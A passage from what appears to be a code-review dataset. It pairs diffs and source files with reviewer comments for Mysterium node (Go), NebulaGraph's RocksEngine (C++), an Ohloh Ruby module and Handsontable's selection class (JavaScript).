resolver.GetOutboundIP() if err != nil { return err } _, err = firewall.BlockNonTunnelTraffic(firewall.Global, outboundIP) return err } return nil } func (di *Dependencies) bootstrapBeneficiaryProvider(options node.Options) { di.BeneficiaryProvider = beneficiary.NewProvider( options.ChainID, di.AddressProvider, di.Storage, di.BCHelper, ) } func (di *Dependencies) bootstrapBeneficiarySaver(options node.Options) { di.BeneficiarySaver = beneficiary.NewSaver( options.ChainID, di.AddressProvider, di.Storage, di.BCHelper, di.HermesPromiseSettler, ) } func (di *Dependencies) handleConnStateChange() error { if di.HTTPClient == nil { return errors.New("HTTPClient is not initialized") } latestState := connectionstate.NotConnected return di.EventBus.SubscribeAsync(connectionstate.AppTopicConnectionState, func(e connectionstate.AppEventConnectionState) { // Here we care only about connected and disconnected events. if e.State != connectionstate.Connected && e.State != connectionstate.NotConnected { return } isDisconnected := latestState == connectionstate.Connected && e.State == connectionstate.NotConnected isConnected := latestState == connectionstate.NotConnected && e.State == connectionstate.Connected if isDisconnected || isConnected { netutil.LogNetworkStats() log.Info().Msg("Reconnecting HTTP clients due to VPN connection state change") di.HTTPTransport.CloseIdleConnections() for _, cl := range di.EtherClients { if err := cl.Reconnect(time.Second * 15); err != nil { log.Warn().Err(err).Msg("Ethereum client failed to reconnect, will retry one more time") // Default golang DNS resolver does not allow to reload /etc/resolv.conf more than once per 5 seconds. // This could lead to the problem, when right after connect/disconnect new DNS config not applied instantly. // Doing a couple of retries here to make sure we reconnected Ethererum client correctly. // Default DNS timeout is 10 seconds. It's enough to try to reconnect only twice to cover 5 seconds lag for DNS config reload. // https://github.com/mysteriumnetwork/node/issues/2282 if err := cl.Reconnect(time.Second * 15); err != nil { log.Error().Err(err).Msg("Ethereum client failed to reconnect") } } } di.EventBus.Publish(registry.AppTopicEthereumClientReconnected, struct{}{}) } latestState = e.State }) } func (di *Dependencies) handleNATStatusForPublicIP() { outIP, err := di.IPResolver.GetOutboundIP() if err != nil { log.Error().Err(err).Msg("Failed to get outbound IP address") } pubIP, err := di.IPResolver.GetPublicIP() if err != nil { log.Error().Err(err).Msg("Failed to get public IP address") } if outIP == pubIP && pubIP != "" { di.EventBus.Publish(event.AppTopicTraversal, event.BuildSuccessfulEvent("", "public_ip")) } } func (di *Dependencies) bootstrapResidentCountry() error { if di.EventBus == nil { return errMissingDependency("di.EventBus") } if di.LocationResolver == nil { return errMissingDependency("di.LocationResolver") } di.ResidentCountry = identity.NewResidentCountry(di.EventBus, di.LocationResolver) return nil } func errMissingDependency(dep string) error { return errors.New("Missing dependency: " + dep) } // AllowURLAccess allows the requested addresses to be served when the tunnel is active. func (di *Dependencies) AllowURLAccess(servers ...string) error { if _, err := firewall.AllowURLAccess(servers...); err != nil { return err } if _, err := di.ServiceFirewall.AllowURLAccess(servers...); err != nil { return err } if config.GetBool(config.FlagKeepConnectedOnFail) { if err := router.AllowURLAccess(servers...); err != nil { return err } } return nil } func getUDPListenPorts() (port.Range, error) { udpPortRange, err := port.ParseRange(config.GetString(config.FlagUDPListenPorts)) if err != nil { log.Warn().Err(err).Msg("Failed to parse UDP listen port range, using default value") return port.Range{}, fmt.Errorf("failed to parse UDP ports: %w", err) } return udpPortRange, nil }
1
17,257
This route excluding needed for reconnect only when one connection is lost and we trying to establish another. I was thinking to make 2 separate flags for killswitch and reconnect enabling. This way we can keep killswitch working, but we don't need these routes excluded.
mysteriumnetwork-node
go
@@ -124,8 +124,8 @@ RocksEngine::RocksEngine(GraphSpaceID spaceId, } CHECK(status.ok()) << status.ToString(); db_.reset(db); - partsNum_ = allParts().size(); extractorLen_ = sizeof(PartitionID) + vIdLen; + partsNum_ = allParts().size(); LOG(INFO) << "open rocksdb on " << path; backup();
1
/* Copyright (c) 2018 vesoft inc. All rights reserved. * * This source code is licensed under Apache 2.0 License, * attached with Common Clause Condition 1.0, found in the LICENSES directory. */ #include "kvstore/RocksEngine.h" #include <folly/String.h> #include <rocksdb/convenience.h> #include "common/base/Base.h" #include "common/fs/FileUtils.h" #include "common/utils/NebulaKeyUtils.h" #include "kvstore/KVStore.h" DEFINE_bool(move_files, false, "Move the SST files instead of copy when ingest into dataset"); namespace nebula { namespace kvstore { using fs::FileType; using fs::FileUtils; namespace { /*************************************** * * Implementation of WriteBatch * **************************************/ class RocksWriteBatch : public WriteBatch { private: rocksdb::WriteBatch batch_; public: RocksWriteBatch() : batch_(FLAGS_rocksdb_batch_size) {} virtual ~RocksWriteBatch() = default; nebula::cpp2::ErrorCode put(folly::StringPiece key, folly::StringPiece value) override { if (batch_.Put(toSlice(key), toSlice(value)).ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode remove(folly::StringPiece key) override { if (batch_.Delete(toSlice(key)).ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { return nebula::cpp2::ErrorCode::E_UNKNOWN; } } // Remove all keys in the range [start, end) nebula::cpp2::ErrorCode removeRange(folly::StringPiece start, folly::StringPiece end) override { if (batch_.DeleteRange(toSlice(start), toSlice(end)).ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { return nebula::cpp2::ErrorCode::E_UNKNOWN; } } rocksdb::WriteBatch* data() { return &batch_; } }; } // Anonymous namespace /*************************************** * * Implementation of WriteBatch * **************************************/ RocksEngine::RocksEngine(GraphSpaceID spaceId, int32_t vIdLen, const std::string& dataPath, const std::string& walPath, std::shared_ptr<rocksdb::MergeOperator> mergeOp, std::shared_ptr<rocksdb::CompactionFilterFactory> cfFactory, bool readonly) : KVEngine(spaceId), spaceId_(spaceId), dataPath_(folly::stringPrintf("%s/nebula/%d", dataPath.c_str(), spaceId)) { // set wal path as dataPath by default if (walPath.empty()) { walPath_ = folly::stringPrintf("%s/nebula/%d", dataPath.c_str(), spaceId); } else { walPath_ = folly::stringPrintf("%s/nebula/%d", walPath.c_str(), spaceId); } auto path = folly::stringPrintf("%s/data", dataPath_.c_str()); if (FileUtils::fileType(path.c_str()) == FileType::NOTEXIST) { if (readonly) { LOG(FATAL) << "Path " << path << " not exist"; } else { if (!FileUtils::makeDir(path)) { LOG(FATAL) << "makeDir " << path << " failed"; } } } if (FileUtils::fileType(path.c_str()) != FileType::DIRECTORY) { LOG(FATAL) << path << " is not directory"; } openBackupEngine(spaceId); rocksdb::Options options; rocksdb::DB* db = nullptr; rocksdb::Status status = initRocksdbOptions(options, spaceId, vIdLen); CHECK(status.ok()) << status.ToString(); if (mergeOp != nullptr) { options.merge_operator = mergeOp; } if (cfFactory != nullptr) { options.compaction_filter_factory = cfFactory; } if (readonly) { status = rocksdb::DB::OpenForReadOnly(options, path, &db); } else { status = rocksdb::DB::Open(options, path, &db); } CHECK(status.ok()) << status.ToString(); db_.reset(db); partsNum_ = allParts().size(); extractorLen_ = sizeof(PartitionID) + vIdLen; LOG(INFO) << "open rocksdb on " << path; backup(); } void RocksEngine::stop() { if (db_) { // Because we trigger compaction in WebService, we need to stop all // background work before we stop HttpServer. rocksdb::CancelAllBackgroundWork(db_.get(), true); } } std::unique_ptr<WriteBatch> RocksEngine::startBatchWrite() { return std::make_unique<RocksWriteBatch>(); } nebula::cpp2::ErrorCode RocksEngine::commitBatchWrite(std::unique_ptr<WriteBatch> batch, bool disableWAL, bool sync, bool wait) { rocksdb::WriteOptions options; options.disableWAL = disableWAL; options.sync = sync; options.no_slowdown = !wait; auto* b = static_cast<RocksWriteBatch*>(batch.get()); rocksdb::Status status = db_->Write(options, b->data()); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else if (!wait && status.IsIncomplete()) { return nebula::cpp2::ErrorCode::E_WRITE_STALLED; } LOG(ERROR) << "Write into rocksdb failed because of " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } nebula::cpp2::ErrorCode RocksEngine::get(const std::string& key, std::string* value) { rocksdb::ReadOptions options; rocksdb::Status status = db_->Get(options, rocksdb::Slice(key), value); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else if (status.IsNotFound()) { VLOG(3) << "Get: " << key << " Not Found"; return nebula::cpp2::ErrorCode::E_KEY_NOT_FOUND; } else { VLOG(3) << "Get Failed: " << key << " " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } std::vector<Status> RocksEngine::multiGet(const std::vector<std::string>& keys, std::vector<std::string>* values) { rocksdb::ReadOptions options; std::vector<rocksdb::Slice> slices; for (size_t index = 0; index < keys.size(); index++) { slices.emplace_back(keys[index]); } auto status = db_->MultiGet(options, slices, values); std::vector<Status> ret; std::transform(status.begin(), status.end(), std::back_inserter(ret), [](const auto& s) { if (s.ok()) { return Status::OK(); } else if (s.IsNotFound()) { return Status::KeyNotFound(); } else { return Status::Error(); } }); return ret; } nebula::cpp2::ErrorCode RocksEngine::range(const std::string& start, const std::string& end, std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; options.total_order_seek = FLAGS_enable_rocksdb_prefix_filtering; rocksdb::Iterator* iter = db_->NewIterator(options); if (iter) { iter->Seek(rocksdb::Slice(start)); } storageIter->reset(new RocksRangeIter(iter, start, end)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::prefix(const std::string& prefix, std::unique_ptr<KVIterator>* storageIter) { // In fact, we don't need to check prefix.size() >= extractorLen_, which is caller's duty to make // sure the prefix bloom filter exists. But this is quite error-proning, so we do a check here. if (FLAGS_enable_rocksdb_prefix_filtering && prefix.size() >= extractorLen_) { return prefixWithExtractor(prefix, storageIter); } else { return prefixWithoutExtractor(prefix, storageIter); } } nebula::cpp2::ErrorCode RocksEngine::prefixWithExtractor(const std::string& prefix, std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; options.prefix_same_as_start = true; rocksdb::Iterator* iter = db_->NewIterator(options); if (iter) { iter->Seek(rocksdb::Slice(prefix)); } storageIter->reset(new RocksPrefixIter(iter, prefix)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::prefixWithoutExtractor( const std::string& prefix, std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; // prefix_same_as_start is false by default options.total_order_seek = FLAGS_enable_rocksdb_prefix_filtering; rocksdb::Iterator* iter = db_->NewIterator(options); if (iter) { iter->Seek(rocksdb::Slice(prefix)); } storageIter->reset(new RocksPrefixIter(iter, prefix)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::rangeWithPrefix(const std::string& start, const std::string& prefix, std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; // prefix_same_as_start is false by default options.total_order_seek = FLAGS_enable_rocksdb_prefix_filtering; rocksdb::Iterator* iter = db_->NewIterator(options); if (iter) { iter->Seek(rocksdb::Slice(start)); } storageIter->reset(new RocksPrefixIter(iter, prefix)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::scan(std::unique_ptr<KVIterator>* storageIter) { rocksdb::ReadOptions options; options.total_order_seek = true; rocksdb::Iterator* iter = db_->NewIterator(options); iter->SeekToFirst(); storageIter->reset(new RocksCommonIter(iter)); return nebula::cpp2::ErrorCode::SUCCEEDED; } nebula::cpp2::ErrorCode RocksEngine::put(std::string key, std::string value) { rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; rocksdb::Status status = db_->Put(options, key, value); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "Put Failed: " << key << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::multiPut(std::vector<KV> keyValues) { rocksdb::WriteBatch updates(FLAGS_rocksdb_batch_size); for (size_t i = 0; i < keyValues.size(); i++) { updates.Put(keyValues[i].first, keyValues[i].second); } rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; rocksdb::Status status = db_->Write(options, &updates); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "MultiPut Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::remove(const std::string& key) { rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; auto status = db_->Delete(options, key); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "Remove Failed: " << key << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::multiRemove(std::vector<std::string> keys) { rocksdb::WriteBatch deletes(FLAGS_rocksdb_batch_size); for (size_t i = 0; i < keys.size(); i++) { deletes.Delete(keys[i]); } rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; rocksdb::Status status = db_->Write(options, &deletes); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "MultiRemove Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::removeRange(const std::string& start, const std::string& end) { rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; auto status = db_->DeleteRange(options, db_->DefaultColumnFamily(), start, end); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { VLOG(3) << "RemoveRange Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } std::string RocksEngine::partKey(PartitionID partId) { return NebulaKeyUtils::systemPartKey(partId); } void RocksEngine::addPart(PartitionID partId) { auto ret = put(partKey(partId), ""); if (ret == nebula::cpp2::ErrorCode::SUCCEEDED) { partsNum_++; CHECK_GE(partsNum_, 0); } } void RocksEngine::removePart(PartitionID partId) { rocksdb::WriteOptions options; options.disableWAL = FLAGS_rocksdb_disable_wal; std::vector<std::string> sysKeysToDelete; sysKeysToDelete.emplace_back(partKey(partId)); sysKeysToDelete.emplace_back(NebulaKeyUtils::systemCommitKey(partId)); auto code = multiRemove(sysKeysToDelete); if (code == nebula::cpp2::ErrorCode::SUCCEEDED) { partsNum_--; CHECK_GE(partsNum_, 0); } } std::vector<PartitionID> RocksEngine::allParts() { std::unique_ptr<KVIterator> iter; std::vector<PartitionID> parts; static const std::string prefixStr = NebulaKeyUtils::systemPrefix(); auto retCode = this->prefix(prefixStr, &iter); if (nebula::cpp2::ErrorCode::SUCCEEDED != retCode) { return parts; } while (iter->valid()) { auto key = iter->key(); CHECK_EQ(key.size(), sizeof(PartitionID) + sizeof(NebulaSystemKeyType)); PartitionID partId = *reinterpret_cast<const PartitionID*>(key.data()); if (!NebulaKeyUtils::isSystemPart(key)) { VLOG(3) << "Skip: " << std::bitset<32>(partId); iter->next(); continue; } partId = partId >> 8; parts.emplace_back(partId); iter->next(); } return parts; } int32_t RocksEngine::totalPartsNum() { return partsNum_; } nebula::cpp2::ErrorCode RocksEngine::ingest(const std::vector<std::string>& files, bool verifyFileChecksum) { rocksdb::IngestExternalFileOptions options; options.move_files = FLAGS_move_files; options.verify_file_checksum = verifyFileChecksum; rocksdb::Status status = db_->IngestExternalFile(files, options); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "Ingest Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::setOption(const std::string& configKey, const std::string& configValue) { std::unordered_map<std::string, std::string> configOptions = {{configKey, configValue}}; rocksdb::Status status = db_->SetOptions(configOptions); if (status.ok()) { LOG(INFO) << "SetOption Succeeded: " << configKey << ":" << configValue; return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "SetOption Failed: " << configKey << ":" << configValue; return nebula::cpp2::ErrorCode::E_INVALID_PARM; } } nebula::cpp2::ErrorCode RocksEngine::setDBOption(const std::string& configKey, const std::string& configValue) { std::unordered_map<std::string, std::string> configOptions = {{configKey, configValue}}; rocksdb::Status status = db_->SetDBOptions(configOptions); if (status.ok()) { LOG(INFO) << "SetDBOption Succeeded: " << configKey << ":" << configValue; return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "SetDBOption Failed: " << configKey << ":" << configValue; return nebula::cpp2::ErrorCode::E_INVALID_PARM; } } ErrorOr<nebula::cpp2::ErrorCode, std::string> RocksEngine::getProperty( const std::string& property) { std::string value; if (!db_->GetProperty(property, &value)) { return nebula::cpp2::ErrorCode::E_INVALID_PARM; } else { return value; } } nebula::cpp2::ErrorCode RocksEngine::compact() { rocksdb::CompactRangeOptions options; options.change_level = FLAGS_rocksdb_compact_change_level; options.target_level = FLAGS_rocksdb_compact_target_level; rocksdb::Status status = db_->CompactRange(options, nullptr, nullptr); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "CompactAll Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::flush() { rocksdb::FlushOptions options; rocksdb::Status status = db_->Flush(options); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "Flush Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_UNKNOWN; } } nebula::cpp2::ErrorCode RocksEngine::backup() { if (!backupDb_) { return nebula::cpp2::ErrorCode::SUCCEEDED; } LOG(INFO) << "begin to backup space " << spaceId_ << " on path " << backupPath_; bool flushBeforeBackup = true; auto status = backupDb_->CreateNewBackup(db_.get(), flushBeforeBackup); if (status.ok()) { return nebula::cpp2::ErrorCode::SUCCEEDED; } else { LOG(ERROR) << "backup failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_BACKUP_FAILED; } } void RocksEngine::openBackupEngine(GraphSpaceID spaceId) { // If backup dir is not empty, set backup related options if (FLAGS_rocksdb_table_format == "PlainTable" && !FLAGS_rocksdb_backup_dir.empty()) { backupPath_ = folly::stringPrintf("%s/rocksdb_backup/%d", FLAGS_rocksdb_backup_dir.c_str(), spaceId); if (FileUtils::fileType(backupPath_.c_str()) == FileType::NOTEXIST) { if (!FileUtils::makeDir(backupPath_)) { LOG(FATAL) << "makeDir " << backupPath_ << " failed"; } } rocksdb::BackupEngine* backupDb; rocksdb::BackupableDBOptions backupOptions(backupPath_); backupOptions.backup_log_files = false; auto status = rocksdb::BackupEngine::Open(rocksdb::Env::Default(), backupOptions, &backupDb); CHECK(status.ok()) << status.ToString(); backupDb_.reset(backupDb); LOG(INFO) << "open plain table backup engine on " << backupPath_; std::string dataPath = folly::stringPrintf("%s/data", dataPath_.c_str()); auto walDir = dataPath; if (!FLAGS_rocksdb_wal_dir.empty()) { walDir = folly::stringPrintf("%s/rocksdb_wal/%d", FLAGS_rocksdb_wal_dir.c_str(), spaceId); } else { LOG(WARNING) << "rocksdb wal is stored with data"; } rocksdb::RestoreOptions restoreOptions; restoreOptions.keep_log_files = true; status = backupDb_->RestoreDBFromLatestBackup(dataPath, walDir, restoreOptions); LOG(INFO) << "try to restore from backup path " << backupPath_; if (status.IsNotFound()) { LOG(WARNING) << "no valid backup found"; return; } else if (!status.ok()) { LOG(FATAL) << status.ToString(); } LOG(INFO) << "restore from latest backup succesfully" << ", backup path " << backupPath_ << ", wal path " << walDir << ", data path " << dataPath; } } nebula::cpp2::ErrorCode RocksEngine::createCheckpoint(const std::string& name) { LOG(INFO) << "Begin checkpoint : " << dataPath_; /* * The default checkpoint directory structure is : * |--FLAGS_data_path * |----nebula * |------space1 * |--------data * |--------wal * |--------checkpoints * |----------snapshot1 * |------------data * |------------wal * |----------snapshot2 * |----------snapshot3 * */ auto checkpointPath = folly::stringPrintf("%s/checkpoints/%s/data", dataPath_.c_str(), name.c_str()); LOG(INFO) << "Target checkpoint path : " << checkpointPath; if (fs::FileUtils::exist(checkpointPath) && !fs::FileUtils::remove(checkpointPath.data(), true)) { LOG(ERROR) << "Remove exist dir failed of checkpoint : " << checkpointPath; return nebula::cpp2::ErrorCode::E_STORE_FAILURE; } auto parent = checkpointPath.substr(0, checkpointPath.rfind('/')); if (!FileUtils::exist(parent)) { if (!FileUtils::makeDir(parent)) { LOG(ERROR) << "Make dir " << parent << " failed"; return nebula::cpp2::ErrorCode::E_UNKNOWN; } } rocksdb::Checkpoint* checkpoint; rocksdb::Status status = rocksdb::Checkpoint::Create(db_.get(), &checkpoint); std::unique_ptr<rocksdb::Checkpoint> cp(checkpoint); if (!status.ok()) { LOG(ERROR) << "Init checkpoint Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_FAILED_TO_CHECKPOINT; } status = cp->CreateCheckpoint(checkpointPath, 0); if (!status.ok()) { LOG(ERROR) << "Create checkpoint Failed: " << status.ToString(); return nebula::cpp2::ErrorCode::E_FAILED_TO_CHECKPOINT; } return nebula::cpp2::ErrorCode::SUCCEEDED; } ErrorOr<nebula::cpp2::ErrorCode, std::string> RocksEngine::backupTable( const std::string& name, const std::string& tablePrefix, std::function<bool(const folly::StringPiece& key)> filter) { auto backupPath = folly::stringPrintf( "%s/checkpoints/%s/%s.sst", dataPath_.c_str(), name.c_str(), tablePrefix.c_str()); VLOG(3) << "Start writing the sst file with table (" << tablePrefix << ") to file: " << backupPath; auto parent = backupPath.substr(0, backupPath.rfind('/')); if (!FileUtils::exist(parent)) { if (!FileUtils::makeDir(parent)) { LOG(ERROR) << "Make dir " << parent << " failed"; return nebula::cpp2::ErrorCode::E_BACKUP_FAILED; } } rocksdb::Options options; options.file_checksum_gen_factory = rocksdb::GetFileChecksumGenCrc32cFactory(); rocksdb::SstFileWriter sstFileWriter(rocksdb::EnvOptions(), options); std::unique_ptr<KVIterator> iter; auto ret = prefix(tablePrefix, &iter); if (ret != nebula::cpp2::ErrorCode::SUCCEEDED) { return nebula::cpp2::ErrorCode::E_BACKUP_EMPTY_TABLE; } if (!iter->valid()) { return nebula::cpp2::ErrorCode::E_BACKUP_EMPTY_TABLE; } auto s = sstFileWriter.Open(backupPath); if (!s.ok()) { LOG(ERROR) << "BackupTable failed, path: " << backupPath << ", error: " << s.ToString(); return nebula::cpp2::ErrorCode::E_BACKUP_TABLE_FAILED; } while (iter->valid()) { if (filter && filter(iter->key())) { iter->next(); continue; } s = sstFileWriter.Put(iter->key().toString(), iter->val().toString()); if (!s.ok()) { LOG(ERROR) << "BackupTable failed, path: " << backupPath << ", error: " << s.ToString(); sstFileWriter.Finish(); return nebula::cpp2::ErrorCode::E_BACKUP_TABLE_FAILED; } iter->next(); } s = sstFileWriter.Finish(); if (!s.ok()) { LOG(WARNING) << "Failure to insert data when backupTable, " << backupPath << ", error: " << s.ToString(); return nebula::cpp2::ErrorCode::E_BACKUP_EMPTY_TABLE; } if (sstFileWriter.FileSize() == 0) { return nebula::cpp2::ErrorCode::E_BACKUP_EMPTY_TABLE; } if (backupPath[0] == '/') { return backupPath; } auto result = nebula::fs::FileUtils::realPath(backupPath.c_str()); if (!result.ok()) { return nebula::cpp2::ErrorCode::E_BACKUP_TABLE_FAILED; } return result.value(); } } // namespace kvstore } // namespace nebula
1
31,659
why can this modification avoid crash?
vesoft-inc-nebula
cpp
@@ -1,8 +1,7 @@ module RedirectIfDisabled def redirect_if_disabled - account = current_user - return unless account && account.access.disabled? - request.env[:clearance].sign_out - redirect_to disabled_account_url(account) + return unless @account && @account.access.disabled? + request.env[:clearance].sign_out if @account.id == current_user.id + redirect_to disabled_account_url(@account) end end
1
module RedirectIfDisabled def redirect_if_disabled account = current_user return unless account && account.access.disabled? request.env[:clearance].sign_out redirect_to disabled_account_url(account) end end
1
9,180
This looks good -- signing out the user if the current user is disabled
blackducksoftware-ohloh-ui
rb
@@ -47,13 +47,13 @@ class Selection { */ this.selectedByCorner = false; /** - * The collection of the selection layer levels where the whole row was selected using the row header. + * The collection of the selection layer levels where the whole row was selected using the row header or the corner header. * * @type {Set.<number>} */ this.selectedByRowHeader = new Set(); /** - * The collection of the selection layer levels where the whole column was selected using the column header. + * The collection of the selection layer levels where the whole column was selected using the column header or the corner header. * * @type {Set.<number>} */
1
import Highlight, { AREA_TYPE, HEADER_TYPE, CELL_TYPE } from './highlight/highlight'; import SelectionRange from './range'; import { CellCoords } from './../3rdparty/walkontable/src'; import { isPressedCtrlKey } from './../utils/keyStateObserver'; import { createObjectPropListener, mixin } from './../helpers/object'; import { isUndefined } from './../helpers/mixed'; import { arrayEach } from './../helpers/array'; import localHooks from './../mixins/localHooks'; import Transformation from './transformation'; import { detectSelectionType, isValidCoord, normalizeSelectionFactory, SELECTION_TYPE_EMPTY, SELECTION_TYPE_UNRECOGNIZED, } from './utils'; import { toSingleLine } from './../helpers/templateLiteralTag'; /** * @class Selection * @util */ class Selection { constructor(settings, tableProps) { /** * Handsontable settings instance. * * @type {GridSettings} */ this.settings = settings; /** * An additional object with dynamically defined properties which describes table state. * * @type {object} */ this.tableProps = tableProps; /** * The flag which determines if the selection is in progress. * * @type {boolean} */ this.inProgress = false; /** * The flag indicates that selection was performed by clicking the corner overlay. * * @type {boolean} */ this.selectedByCorner = false; /** * The collection of the selection layer levels where the whole row was selected using the row header. * * @type {Set.<number>} */ this.selectedByRowHeader = new Set(); /** * The collection of the selection layer levels where the whole column was selected using the column header. * * @type {Set.<number>} */ this.selectedByColumnHeader = new Set(); /** * Selection data layer (handle visual coordinates). * * @type {SelectionRange} */ this.selectedRange = new SelectionRange(); /** * Visualization layer. * * @type {Highlight} */ this.highlight = new Highlight({ headerClassName: settings.currentHeaderClassName, activeHeaderClassName: settings.activeHeaderClassName, rowClassName: settings.currentRowClassName, columnClassName: settings.currentColClassName, disableHighlight: this.settings.disableVisualSelection, cellCornerVisible: (...args) => this.isCellCornerVisible(...args), areaCornerVisible: (...args) => this.isAreaCornerVisible(...args), visualToRenderableCoords: coords => this.tableProps.visualToRenderableCoords(coords), renderableToVisualCoords: coords => this.tableProps.renderableToVisualCoords(coords), }); /** * The module for modifying coordinates. * * @type {Transformation} */ this.transformation = new Transformation(this.selectedRange, { countRows: () => this.tableProps.countRowsTranslated(), countCols: () => this.tableProps.countColsTranslated(), visualToRenderableCoords: coords => this.tableProps.visualToRenderableCoords(coords), renderableToVisualCoords: coords => this.tableProps.renderableToVisualCoords(coords), fixedRowsBottom: () => settings.fixedRowsBottom, minSpareRows: () => settings.minSpareRows, minSpareCols: () => settings.minSpareCols, autoWrapRow: () => settings.autoWrapRow, autoWrapCol: () => settings.autoWrapCol, }); this.transformation.addLocalHook('beforeTransformStart', (...args) => this.runLocalHooks('beforeModifyTransformStart', ...args)); this.transformation.addLocalHook('afterTransformStart', (...args) => this.runLocalHooks('afterModifyTransformStart', ...args)); this.transformation.addLocalHook('beforeTransformEnd', (...args) => this.runLocalHooks('beforeModifyTransformEnd', ...args)); this.transformation.addLocalHook('afterTransformEnd', (...args) => this.runLocalHooks('afterModifyTransformEnd', ...args)); this.transformation.addLocalHook('insertRowRequire', (...args) => this.runLocalHooks('insertRowRequire', ...args)); this.transformation.addLocalHook('insertColRequire', (...args) => this.runLocalHooks('insertColRequire', ...args)); } /** * Get data layer for current selection. * * @returns {SelectionRange} */ getSelectedRange() { return this.selectedRange; } /** * Indicate that selection process began. It sets internaly `.inProgress` property to `true`. */ begin() { this.inProgress = true; } /** * Indicate that selection process finished. It sets internaly `.inProgress` property to `false`. */ finish() { this.runLocalHooks('afterSelectionFinished', Array.from(this.selectedRange)); this.inProgress = false; } /** * Check if the process of selecting the cell/cells is in progress. * * @returns {boolean} */ isInProgress() { return this.inProgress; } /** * Starts selection range on given coordinate object. * * @param {CellCoords} coords Visual coords. * @param {boolean} [multipleSelection] If `true`, selection will be worked in 'multiple' mode. This option works * only when 'selectionMode' is set as 'multiple'. If the argument is not defined * the default trigger will be used (isPressedCtrlKey() helper). * @param {boolean} [fragment=false] If `true`, the selection will be treated as a partial selection where the * `setRangeEnd` method won't be called on every `setRangeStart` call. */ setRangeStart(coords, multipleSelection, fragment = false) { const isMultipleMode = this.settings.selectionMode === 'multiple'; const isMultipleSelection = isUndefined(multipleSelection) ? isPressedCtrlKey() : multipleSelection; const isRowNegative = coords.row < 0; const isColumnNegative = coords.col < 0; const selectedByCorner = isRowNegative && isColumnNegative; // We change coordinates of selection to start from 0 (we don't include headers in a selection). if (isRowNegative) { coords.row = 0; } if (isColumnNegative) { coords.col = 0; } this.selectedByCorner = selectedByCorner; this.runLocalHooks(`beforeSetRangeStart${fragment ? 'Only' : ''}`, coords); if (!isMultipleMode || (isMultipleMode && !isMultipleSelection && isUndefined(multipleSelection))) { this.selectedRange.clear(); } this.selectedRange.add(coords); if (this.getLayerLevel() === 0) { this.selectedByRowHeader.clear(); this.selectedByColumnHeader.clear(); } if (!selectedByCorner && isColumnNegative) { this.selectedByRowHeader.add(this.getLayerLevel()); } if (!selectedByCorner && isRowNegative) { this.selectedByColumnHeader.add(this.getLayerLevel()); } if (!fragment) { this.setRangeEnd(coords); } } /** * Starts selection range on given coordinate object. * * @param {CellCoords} coords Visual coords. * @param {boolean} [multipleSelection] If `true`, selection will be worked in 'multiple' mode. This option works * only when 'selectionMode' is set as 'multiple'. If the argument is not defined * the default trigger will be used (isPressedCtrlKey() helper). */ setRangeStartOnly(coords, multipleSelection) { this.setRangeStart(coords, multipleSelection, true); } /** * Ends selection range on given coordinate object. * * @param {CellCoords} coords Visual coords. */ setRangeEnd(coords) { if (this.selectedRange.isEmpty()) { return; } this.runLocalHooks('beforeSetRangeEnd', coords); this.begin(); const cellRange = this.selectedRange.current(); if (this.settings.selectionMode !== 'single') { cellRange.setTo(new CellCoords(coords.row, coords.col)); } // Set up current selection. this.highlight.getCell().clear(); if (this.highlight.isEnabledFor(CELL_TYPE)) { 